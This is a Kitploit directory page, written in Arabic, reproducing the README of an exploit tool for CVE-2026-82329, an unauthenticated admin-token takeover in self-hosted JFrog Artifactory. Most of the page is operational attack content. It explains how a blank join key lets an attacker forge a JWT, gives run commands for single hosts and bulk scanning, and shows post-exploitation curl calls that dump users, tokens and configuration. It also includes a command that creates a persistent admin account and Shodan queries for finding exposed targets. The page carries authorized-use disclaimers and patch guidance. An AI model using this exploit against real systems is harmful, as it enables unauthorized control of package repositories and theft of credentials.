Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-82329-JFrog-Artifactory-Auth-Bypass — استغلال لثغرة CVE-2026-82329، وهي تجاوز للمصادقة دون تحقق في JFrog Artifactory المستضاف ذاتيًا، مما يسمح بالاستيلاء على رمز المسؤول عبر مفتاح انضمام فارغ. | Kitploit
أدوات/GitHubGitHub/ynsmroztas/cve-2026-82329-jfrog-artifactory-auth-bypass
المصادقة والترخيصماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubynsmroztas/cve-2026-82329-jfrog-artifactory-auth-bypass

CVE-2026-82329-JFrog-Artifactory-Auth-Bypass

استغلال لثغرة CVE-2026-82329، وهي تجاوز للمصادقة دون تحقق في JFrog Artifactory المستضاف ذاتيًا، مما يسمح بالاستيلاء على رمز المسؤول عبر مفتاح انضمام فارغ.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 8س 50دلم تتم المراجعة بعد

artifactory.py

artifactory.py — CVE-2026-82329 unauth admin takeover

root@kitploit:~
╔══════════════════════════════════════════════════════════╗
║  artifactory  ·  CVE-2026-82329 unauth admin takeover    ║
║  mitsec       ·  https://x.com/ynsmroztas                ║
╚══════════════════════════════════════════════════════════╝

CVE-2026-82329 — JFrog Artifactory (الاستضافة الذاتية) انضمام JWT غير مصادق عليه
→ رمز خدمة admin → رمز وصول لمنصة applied-permissions/admin.

CVSS 9.8 · CWE-287 · CISA KEV · تم استغلاله في البرية.

للاختبار المصرح به فقط. لا تقم بتشغيل هذا ضد أنظمة لا تملكها أو ليس لديك إذن كتابي لاختبارها.


ما الذي يفعله

تثق التثبيتات الافتراضية ذاتية الاستضافة بمفتاح انضمام فارغ.

root@kitploit:~
JoinKeyUtils.getSigningKey("")  ==  pkcs7(empty, 32)  ==  32 × 0x20
kid = SHA256("") = e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

JFrog المستضاف سحابياً مصحح. الاستضافة الذاتية فقط.

سطر إصلاح الوصول: 7.191.14.


التثبيت

root@kitploit:~
# stdlib فقط — لا حاجة لـ pip
python3 artifactory.py -h

التحقق من TLS معطل افتراضياً (شهادة Artifactory ذاتية التوقيع أمر طبيعي).
لا حاجة لأي علامة إضافية.


الاستخدام

root@kitploit:~
# مضيف واحد
python3 artifactory.py -u https://artifactory.example.internal:8082

# طباعة رمز الإدارة المُصكوك
python3 artifactory.py -u https://TARGET:8082 --token

# قائمة / خط أنابيب (بأسلوب httpx، shodan، subfinder)
python3 artifactory.py -l hosts.txt --threads 8
cat hosts.txt | python3 artifactory.py

# إصدار Pro / Enterprise فقط — إنشاء مسؤول محلي دائم (تدميري)
python3 artifactory.py -u https://TARGET:8082 --create-admin auditor:ChangeMe_1

المخرجات

root@kitploit:~
[VULN]  https://TARGET:8082  join=201 svc_scp=admin admin token scp=applied-permissions/admin aud=* config=200/42020b tokens=200 version=7.161.19
[SAFE]  https://patched:8082  join HTTP 401  (patched / no blank key)
[FAIL]  https://dead:8082     unreachable
العلامةالمعنى

--token يطبع قيمة Bearer. هذا هو الاستيلاء — مستخدم تسجيل الدخول اختياري.

--create-admin غالباً ما يُرجع 400 على OSS (PUT /artifactory/api/security/users خاص بـ Pro).
رمز الإدارة لا يزال يعمل. الاستمرارية غير مطلوبة لنتيجة صالحة.


بعد الإصابة — استخدم الرمز

استبدل TARGET والصق الرمز من --token.

root@kitploit:~
TOKEN='eyJ...'          # مخرجات --token
B='https://TARGET:8082'

# الإصدار / الإصدار التجاري
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/artifactory/api/system/version"

# دليل المستخدمين (إداري)
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/access/api/v2/users"

# كل رمز وصول على المثيل
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/access/api/v1/tokens" | head -c 400

# جرد المستودعات
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/artifactory/api/repositories"

قراءات إدارية مفيدة أخرى (لا تكتب إلا إذا كنت مصرحاً):

root@kitploit:~
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/artifactory/api/system/configuration" -o config.xml

curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/artifactory/api/security/users"

curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/access/api/v1/tokens"

الواجهة: المنصة ← سجل الدخول باستخدام Access Token، أو أرسل
Authorization: Bearer <token> مع كل طلب.

مستخدم دائم اختياري (Pro / Access v2)

root@kitploit:~
curl -sk -D- -X POST "$B/access/api/v2/users" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"username":"auditor","email":"[email protected]","password":"ChangeMe_1Aa","admin":true}'

خطأ سياسة كلمة المرور 400 ≠ غير معرض للثغرة. الرمز لديه بالفعل aud=*.


الاستطلاع

root@kitploit:~
# Shodan
http.component:"Artifactory" port:8081,8082
title:"Artifactory" "JFrog"
http.html:"/artifactory/webapp"
ssl.cert.subject.CN:"artifactory"

# المنافذ الشائعة
8081  8082  8040  8046  443

الأداة تزيل /artifactory /ui /webapp من -u وتتواصل مع موجه Access على نفس الأصل.


لماذا --create-admin ليس هو الاكتشاف

أبلغ عن التأثير كالتالي: رمز مسؤول منصة غير مصادق عليه.
إنشاء المستخدم هو خطوة لاحقة، وليس المشكلة الجذرية.


المراجع

  • NVD — CVE-2026-82329
  • نشرات أمان JFrog
  • إصدارات / تصحيحات الإدارة الذاتية
  • المختبر + فرق التصحيح: dinosn/cve-2026-82329-jfrog-artifactory

إخلاء المسؤولية

هذا المستودع هو أداة تحقق للأنظمة التي لديك إذن باختبارها.
صك الرموز، أو سرد المستخدمين، أو إنشاء حسابات على بنية تحتية تابعة لجهات خارجية دون إذن أمر غير قانوني.

التصحيح: قم بالترقية إلى البناء المُصلح لفرعك، واضبط مفتاح انضمام حقيقي، ودوّر الرموز المُصكوكة بعد الإفصاح.


mitsec · @ynsmroztas

تنزيل الأداة
الخطوةالطلبالنتيجة
1تزوير انضمام JWT بنوع HS256 (iat جديد، skip_node_registration=true)سر HMAC معروف
2POST /access/api/v1/registry/join201 رمز خدمة scp=admin
3POST /access/api/v1/tokens200 رمز إداري scp=applied-permissions/admin aud=*
4GET /artifactory/api/system/configurationإثبات إداري فقط (بدون مصادقة = 401)
الفرعالثغرة ≤الإصلاح
7.1117.111.207.111.21
7.1177.117.277.117.28
7.1257.125.197.125.20
7.1337.133.287.133.29
7.1467.146.377.146.38
7.1617.161.197.161.20
VULNتم قبول الانضمام الفارغ + إثبات إداري (configuration أو قائمة الرموز = 200)
SAFEتم رفض الانضمام — مصحح، أو مفاتيح انضمام إضافية مضبوطة، أو ليس Access
INFOتم صك الانضمام، نقاط الإثبات ليست 200 — افحص يدوياً
FAILشبكة / مهلة
السطحOSSPro / Enterprise
صك رمز وصول إدارينعمنعم
قراءة الإعدادات / قائمة الرموز / المستودعاتنعمنعم
PUT /artifactory/api/security/users400 خاص بـ Pro200/201
POST /access/api/v2/usersيعتمد على الإصدار / السياسة201